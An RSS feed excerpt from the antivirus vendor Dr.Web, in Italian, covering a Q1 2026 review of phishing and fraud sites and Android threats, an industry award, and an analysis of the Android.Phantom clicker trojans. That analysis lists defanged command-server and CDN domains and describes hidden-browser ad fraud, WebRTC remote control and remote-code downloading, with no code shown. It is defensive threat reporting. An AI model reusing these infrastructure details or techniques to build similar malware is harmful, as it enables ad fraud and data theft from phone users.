&lt;p class="text-center"&gt;&lt;em&gt;Dopo aver finalizzato "l'ordine", la vittima viene invitata a pagarlo tramite Sistema di pagamenti rapidi&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;I nostri esperti, inoltre, hanno trovato molteplici siti di servizi web che offrono gli svariati servizi finanziari, ad esempio: la possibilità di ottenere rapidamente un microcredito, un prestito o di sottoporsi alla procedura fallimentare. Tali servizi web stessi non forniscono queste prestazioni, come lo si aspetterebbero gli utenti, e sono solo intermediari tra clienti e istituti finanziari. Quello che forniscono dietro pagamento è l'accesso a una selezione di varianti potenzialmente adatte, benché un'aggregazione di simili offerte finanziarie sia disponibile in fonti gratuite. Oltre a ciò, questi servizi web non garantiscono esiti positivi se si presenta una domanda. Per di più, il pagamento dell'accesso non è una tantum, ma rappresenta un abbonamento con addebiti periodici.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/07_finance.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/07_finance.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Uno dei siti dove l'accesso al servizio web di selezione di offerte finanziarie è a pagamento e formalizzato come abbonamento&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;In alcuni casi, tali risorse possono fuorviare utenti offrendo un determinato servizio, ad esempio la ricerca di lavoro, ma fornendo dopo l'iscrizione l'accesso alle stesse offerte finanziarie di ottenimento di prestiti, microcrediti ecc.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/08_job.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/08_job.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Sito web promette assistenza nella ricerca di lavoro, ma una volta pagato l'accesso al servizio web, invece di un elenco di offerte di lavoro, potrebbe fornire le offerte finanziarie di prestiti, microcrediti ecc. dai partner&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;I siti di phishing rilevati nel I trimestre includevano, in particolare, false risorse internet che sfruttavano il tema di una gara sportiva di beneficenza chiamata "Maratona verde". Invitano i visitatori a registrarsi per partecipare alla maratona, tuttavia, questi siti non hanno niente a che fare con l'evento e sono creati per raccogliere i dati confidenziali degli utenti.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/09_maraphon.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/09_maraphon.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Uno dei falsi siti che sfruttano il tema "Maratona verde"&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Gli analisti internet Doctor Web hanno rilevato anche ulteriori falsi siti di servizi web di investimento presumibilmente legati a diversi istituti di credito. Tra di essi erano siti orientati al pubblico da Russia, Kazakistan e altri paesi. I truffatori promettono alti profitti alle potenziali vittime, le quali, per "accedere" alle piattaforme di pseudo investimento, devono completare un breve sondaggio e registrare un account indicando le proprie informazioni personali.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/10_phishing_bank.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/10_phishing_bank.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Esempio di sito di phishing che i malintenzionati spacciano per la risorsa ufficiale del servizio web di investimento di una delle banche russe&lt;/em&gt;&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/11_phishing_bank.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/11_phishing_bank.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Esempio di sito di phishing che i malintenzionati spacciano per la risorsa ufficiale del servizio web di investimento di uno degli istituti di credito di Kazakistan&lt;/em&gt;&lt;/p&gt;

&lt;div class="notrecommend"&gt;
    &lt;a href="https://antifraud.drweb-av.it/dangerous_urls/"&gt;Scopri di più sui siti sconsigliati da Dr.Web&lt;/a&gt;
&lt;/div&gt;

&lt;h3&gt;Software malevoli e indesiderati per dispositivi mobili&lt;/h3&gt;

&lt;p&gt;Secondo i dati delle statistiche di rilevamento di Dr.Web Security Space per dispositivi mobili, nel I trimestre 2026 è continuata la crescita dell'attività dei trojan bancari &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;, osservata nel IV trimestre dell'anno precedente. I più diffusi tra di essi sono stati i campioni della sottofamiglia &lt;b&gt;Android.Banker.Mamont&lt;/b&gt;. Allo stesso tempo, di nuovo è diminuito il numero di rilevamenti dei trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Tra i software potenzialmente pericolosi individuati, sono stati leader i programmi in cui tramite strumenti di modding è inserito il codice spazzatura (vengono rilevati come &lt;a href="https://vms.drweb-av.it/search/?q=Tool.Obfuscator.TrashCode&amp;lng=it"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;). Tale metodo al momento viene attivamente impiegato per proteggere i trojan bancari dal rilevamento da parte degli antivirus. Inoltre, come in precedenza, sono state frequenti le applicazioni modificate tramite l'utility NP Manager (vengono rilevate come &lt;a href="https://vms.drweb-av.it/search/?q=Tool.NPMod&amp;lng=it"&gt;&lt;b&gt;Tool.NPMod&lt;/b&gt;&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;I software indesiderati rilevati più frequentemente sono stati i falsi antivirus &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;, che, per "eliminare" le minacce presumibilmente identificate, richiedono l'acquisto di una versione completa. I software pubblicitari più attivi nel I trimestre si sono rivelati i programmi &lt;a href="https://vms.drweb-av.it/search/?q=Adware.Bastion&amp;lng=it"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; e &lt;b&gt;Adware.Opensite.15&lt;/b&gt;. Quelli primi sono applicazioni di ottimizzazione che creano notifiche di presunti memoria insufficiente ed errori di sistema per visualizzare pubblicità durante "l'ottimizzazione". Quelli secondi sono falsi programmi di cheat per l'ottenimento di varie risorse in giochi, ma in realtà solo caricano siti web con annunci pubblicitari.&lt;/p&gt;

&lt;p&gt;A gennaio 2026 il nostro laboratorio antivirus &lt;a href="https://news.drweb-av.it/show/?i=15110" target="_blank"&gt;ha avvertito&lt;/a&gt; dei trojan clicker &lt;b&gt;Android.Phantom&lt;/b&gt;. Queste applicazioni malevole utilizzano il machine learning e lo streaming video per l'aumento artificiale dei clic su siti web. I cybercriminali li distribuivano in più modi: tramite lo store GetApps per dispositivi Xiaomi, canali Telegram, server Discord, raccolte software di terze parti e attraverso siti malevoli.&lt;/p&gt;

&lt;p&gt;Durante i 3 mesi scorsi, gli analisti di virus Doctor Web hanno identificato sullo store di app Google Play nuove minacce, tra cui erano le applicazioni trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.Subscription&amp;lng=it"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt; studiate per iscrivere utenti a servizi a pagamento.&lt;/p&gt;

&lt;p&gt;Eventi più importanti relativi alla sicurezza "mobile" in I trimestre&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;Trojan bancari &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; sono diventati le minacce per dispositivi Android più diffuse&lt;/li&gt;
    &lt;li&gt;Cybercriminali utilizzavano più spesso utility per il modding di applicazioni Android per proteggere trojan bancari dal rilevamento da antivirus&lt;/li&gt;
    &lt;li&gt;Continuata la tendenza alla diminuzione dell'attività dei trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;Utenti riscontravano i trojan &lt;b&gt;Android.Phantom&lt;/b&gt;, che utilizzano il machine learning e streaming video per l'aumento artificiale dei clic su siti web&lt;/li&gt;
    &lt;li&gt;Sullo store di app Google Play di nuovo venivano distribuite applicazioni malevole&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Per maggiori informazioni sulla situazione di virus per dispositivi mobili nel I trimestre 2026 leggete la nostra &lt;a href="https://news.drweb-av.it/show/review/?i=15136" target="_blank"&gt;panoramica&lt;/a&gt;.&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15134&amp;lng=it</guid><title>Soluzione per la protezione di PC Dr.Web premiata con SKD AWARDS</title><link>https://news.drweb-av.it/show/?i=15134&amp;lng=it&amp;c=5</link><pubDate>Tue, 24 Mar 2026 15:46:11 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;La soluzione per la protezione di PC Dr.Web Security Space di nuovo è stata insignita del premio di settore SKD AWARDS. Dr.Web Security Space si è aggiudicata il riconoscimento come migliore nella categoria "Antivirus per PC".&amp;nbsp;&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Per Doctor Web questo è già il terzo tale premio di seguito. Nel &lt;a href="https://news.drweb-av.it/show/?lng=it&amp;amp;i=14677"&gt;2023&lt;/a&gt; Dr.Web Security Space 12.0 per Windows ha vinto nella categoria "Sicurezza di personal computer", nel &lt;a href="https://news.drweb-av.it/show/?i=14800&amp;amp;lng=it"&gt;2024&lt;/a&gt; la soluzione antivirus per PC si è confermata la migliore, mentre Dr.Web Mobile Engine SDK ha vinto nella categoria "Motori antivirus".&amp;nbsp;&lt;/p&gt;&lt;p&gt;SKD AWARDS è un premio annuale organizzato da SKD Labs, laboratorio indipendente di fama mondiale di test e certificazione nel campo della sicurezza informatica. In modo informale questo premio è chiamato "Oscar per i prodotti di cybersecurity" ed esso viene considerato come uno degli indicatori importanti nella valutazione dell'efficacia dei prodotti specializzati.&amp;nbsp;&lt;/p&gt;&lt;p&gt;Nell'ambito del premio, i prodotti vengono sottoposti a una serie di test, durante i quali vengono valutati le loro funzionalità, prestazioni, innovazioni tecniche, il loro comportamento in scenari reali, la loro capacità di rilevamento delle minacce e di risposta ad esse.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/f2_admin/drweb-ss.jpg" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/drweb-ss.jpg" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15110&amp;lng=it</guid><title>Trojan della famiglia Android.Phantom entrano negli smartphone insieme a giochi e mod pirata di popolari applicazioni. Utilizzano il machine learning e streaming video per l'aumento artificiale dei clic</title><link>https://news.drweb-av.it/show/?i=15110&amp;lng=it&amp;c=5</link><pubDate>Wed, 21 Jan 2026 04:00:00 GMT</pubDate><description>&lt;p&gt;&lt;strong&gt;21 gennaio 2026&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;newslead&gt;Gli specialisti del laboratorio antivirus Doctor Web hanno rilevato e studiato una nuova famiglia di trojan con funzionalità di clicker. Li accomuna una particolarità: o vengono gestiti da un server con il nome &lt;span class="string"&gt;hxxps[:]//dllpgd[.]click&lt;/span&gt;, o vengono scaricati ed eseguiti su suo comando. Il malware di questo tipo infetta gli smartphone con SO Android.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Uno dei canali di distribuzione dei trojan è lo store di applicazioni ufficiale per i dispositivi Xiaomi GetApps.&lt;/p&gt;&lt;div class="img img-two-v same-height mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/01_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/01_Android.Phantom.1.png" alt="#drweb"&gt; &lt;/a&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/02_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/02_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;Abbiamo potuto identificare più giochi mobili contenenti il malware: Creation Magic World (oltre 32mila download), Cute Pet House (&amp;gt;34mila download), Amazing Unicorn Party (&amp;gt;13mila download), Akademia mechty Sakura (&amp;gt;4mila download), Theft Auto Mafia (&amp;gt;61mila download), Open World Gangsters (&amp;gt;11mila download). Tutti i giochi infetti sono pubblicati a nome di uno stesso sviluppatore, SHENZHEN RUIREN NETWORK CO., LTD., i trojan sono incorporati in essi e vengono avviati insieme alle app.&lt;/p&gt;&lt;p&gt;Le versioni originali dei giochi non contenevano il malware. Il 28/29 settembre lo sviluppatore pubblica aggiornamenti per i giochi, in cui è incorporato il trojan&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.2.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;. Esso funziona in due modalità che nel codice del programma sono condizionalmente chiamate modalità segnalazione (signaling) e fantasma (phantom).&lt;/p&gt;&lt;p&gt;In modalità phantom il software malevolo utilizza un browser incorporato su base del widget WebView, nascosto all'utente. In esso, su comando da un server con il nome &lt;span class="string"&gt;hxxps[:]//playstations[.]click&lt;/span&gt;, viene caricato un sito target per l'aumento artificiale dei clic e un file JavaScript "phantom". Quest'ultimo contiene uno scenario per l'automazione delle attività sugli annunci pubblicitari del sito caricato e il framework di machine learning TensorFlowJS. Un modello per questo framework viene scaricato dal server &lt;span class="string"&gt;hxxps[:]//app-download[.]cn-wlcb[.]ufileos[.]com&lt;/span&gt; nella directory dell'applicazione. Negli scenari per l'elaborazione di alcune tipologie di pubblicità,&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.2.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;posiziona il browser su uno schermo virtuale e cattura screenshot. Il trojan li analizza con l'ausilio del modello per il framework TensorFlowJS, e quindi fa clic sugli elementi identificati.&lt;/p&gt;&lt;p&gt;In modalità alternativa signaling il trojan si connette a un server estraneo tramite WebRTC. Questa tecnologia consente ai browser e applicazioni di instaurare una connessione diretta per lo scambio di dati, audio e video in tempo reale senza installazione di ulteriori software. In modalità signaling il server già menzionato &lt;span class="string"&gt;hxxps[:]//dllpgd[.]click&lt;/span&gt; il ruolo di server di segnalazione, stabilendo connessioni tra nodi WebRTC. Inoltre, questo server determina la modalità di funzionamento del trojan, phantom o signaling. I task con i siti target arrivano da &lt;span class="string"&gt;hxxps[:]//playstations[.]click&lt;/span&gt;. Quindi&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.2.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;all'oscuro dell'utente trasmette ai malintenzionati il video dello schermo virtuale con il sito caricato nel browser. Il trojan dà la possibilità al nodo connesso WebRTC di gestire in remoto il browser sullo schermo virtuale: fare clic, scorrimenti, digitare o incollare testi in moduli di input.&lt;/p&gt;&lt;p&gt;Il 15/16 ottobre i suddetti giochi hanno ricevuto un altro aggiornamento. In aggiunta a&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.2.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;, è stato incorporato in essi un modulo denominato&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.5&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;. È un dropper che contiene al suo interno un downloader di codice remoto&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.4.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.4.origin&lt;/b&gt;&lt;/a&gt;. Questo programma scarica altri trojan ancora, progettati per simulare clic su vari siti web. Questi moduli sono più semplici del clicker&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.2.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;— non utilizzano il machine learning o lo streaming video, ma si appoggiano sugli scenari per l'esecuzione di clic, scritti in JavaScript.&lt;/p&gt;&lt;p&gt;Per utilizzare la tecnologia WebRTC su Android, il trojan deve connettere una libreria speciale con Java API che non fa parte del SO standard e delle applicazioni scaricate. Pertanto, inizialmente il trojan funzionava prevalentemente in modalità phantom. Con l'aggiunta alle applicazioni di&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.5&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;, il trojan&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.2.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;ha ricevuto la possibilità di utilizzare il downloader di codice remoto&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.4.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.4.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;per scaricare la libreria richiesta.&lt;/p&gt;&lt;p&gt;I malintenzionati utilizzano anche altri canali di distribuzione dei trojan&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.2.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;e&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.5&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;. Ad esempio, mod dello streaming di musica Spotify con funzionalità premium sbloccate. Vengono pubblicate su vari siti web, eccone alcuni esempi:&lt;/p&gt;&lt;div class="flex justify-center gap-3"&gt;&lt;div class="flex flex-col gap-3"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/03_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/03_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Sito Spotify Plus&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="flex flex-col gap-3"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/04_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/04_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Sito Spotify Pro&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;p class="mt-5"&gt;E in canali Telegram speciali:&lt;/p&gt;&lt;div class="flex flex-col md:flex-row justify-center gap-3"&gt;&lt;div class="flex flex-col gap-1"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/05_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/05_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Spotify Pro&lt;/i&gt;&lt;br&gt;&lt;i&gt;(54.400 iscritti)&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="flex flex-col gap-1"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/06_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/06_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Spotify Plus – Official&lt;/i&gt;&lt;br&gt;&lt;i&gt;(15.057 iscritti)&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;p class="mt-5"&gt;Le mod Spotify collocate sui siti e nei canali Telegram indicati sugli screenshot contengono&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.2.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;e la libreria per l'organizzazione della comunicazione secondo lo standard WebRTC su Android.&lt;/p&gt;&lt;p&gt;Oltre alle mod Spotify, i malintenzionati incorporano i trojan in mod di altre applicazioni popolari: YouTube, Deezer, Netflix ecc. Sono pubblicate su siti speciali con mod:&lt;/p&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/07_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/07_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Sito Apkmody&lt;/i&gt;&lt;/p&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/08_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/08_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Sito Moddroid&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Il sito Moddroid contiene una sezione "Scelta della redazione". Di 20 applicazioni in essa elencate solo 4 erano pulite. Le altre 16 contenevano i trojan della famiglia &lt;strong&gt;Android.Phantom&lt;/strong&gt;. Le app su questi due siti vengono scaricate da uno stesso server CDN &lt;span class="string"&gt;hxxps[:]//cdn[.]topmongo[.]com&lt;/span&gt;. Questi siti hanno i propri canali Telegram dove gli utenti scaricano le mod infette dai trojan:&lt;/p&gt;&lt;div class="flex flex-col md:flex-row justify-center gap-3"&gt;&lt;div class="flex flex-col gap-1"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/09_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/09_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Moddroid.com&lt;/i&gt;&lt;br&gt;&lt;i&gt;(87.653 iscritti)&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="flex flex-col gap-1"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/10_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/10_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Apkmody Chat&lt;/i&gt;&lt;br&gt;&lt;i&gt;(6.297 iscritti)&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;p class="mt-5"&gt;Inoltre, per i loro scopi i criminali utilizzano anche server Discord. Il più grande di essi è Spotify X, circa 24mila iscritti.&lt;/p&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/11_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/11_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/12_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/12_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;Gli amministratori dei server Discord non esitano ad offrire direttamente le mod infette. Ad esempio, sullo screenshot sopra, un amministratore a nome del server suggerisce di scaricare una mod dello streaming musicale Deezer invece di Spotify, in quanto quest'ultima non funziona.&lt;/p&gt;&lt;p&gt;Al link viene scaricato una mod funzionante. Il suo codice è protetto da un packer commerciale, all'interno del quale è nascosto il trojan&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.1.origin&lt;/b&gt;&lt;/a&gt;. Questo è un downloader di codice remoto, su comando del server &lt;span class="string"&gt;hxxps[:]//dllpgd[.]click&lt;/span&gt; esso scarica i malware che già conosciamo&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.2.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;,&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.5&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;&amp;nbsp;e il trojan spia &lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.5.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.5.origin&lt;/b&gt;&lt;/a&gt;. Quest'ultimo invia informazioni sul dispositivo ai malintenzionati, incluso il numero di telefono, la geolocalizzazione, la lista di app installate.&lt;/p&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/13_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/13_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;Questo screenshot dal server mostra quali lingue parlano gli utenti che diventano bersaglio di infezione. Per accedere alle chat in lingue diverse dall'inglese, è necessario mettere una reazione con la bandiera corrispondente. Il numero di utenti maggiore ha segnato lo spagnolo, francese, tedesco, polacco e italiano (senza contare l'inglese che è la lingua principale del server). Inoltre, gli amministratori del server non hanno previsto chat per molti paesi di Asia.&lt;/p&gt;&lt;p&gt;I trojan possono arrecare un significativo danno ai proprietari dei dispositivi infetti. Elenchiamo alcuni possibili esiti:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;&lt;strong&gt;Complicità involontaria.&lt;/strong&gt; Lo smartphone dell'utente può essere utilizzato come bot in un attacco DDoS, rendendo con ciò il proprietario complice involontario in un crimine cyber.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Attività illegale.&lt;/strong&gt; Tramite il dispositivo, i malintenzionati possono commettere attività online illegali, ad esempio, utilizzare lo smartphone in schemi fraudolenti o inviare messaggi spam.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Consumo eccessivo di batteria e traffico.&lt;/strong&gt; Le attività estranee scaricano la batteria e consumano il traffico internet.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Fuga di dati personali.&lt;/strong&gt; &lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.5.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.5.origin&lt;/b&gt;&lt;/a&gt; è una spia e può trasmettere dati sul dispositivo e proprietario.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;I trojan di questa famiglia rappresentano una minaccia per i proprietari di dispositivi mobili Android non protetti da un software antivirus aggiornato. Gli utenti russi riscontrano difficoltà con la registrazione in applicazioni e il pagamento di abbonamenti esteri. La situazione spinge a cercare e utilizzare metodi alternativi, spesso semi-legali, per l'ottenimento dei servizi di tali aziende. Questa situazione è favorevole agli autori di virus, in quanto gli utenti devono rischiare e fidarsi di varianti dubbie. Un gruppo a rischio particolare sono i bambini che non pensano alle regole dell'igiene digitale, volendo solo giocare, ascoltare musica o guardare videoclip.&lt;/p&gt;&lt;p&gt;Vi consigliamo di non scaricare mod su siti e in canali dubbi. Di regola, la verifica di fonti di mod o app richiede tempo, esperienza ed esperienza visiva accumulata. 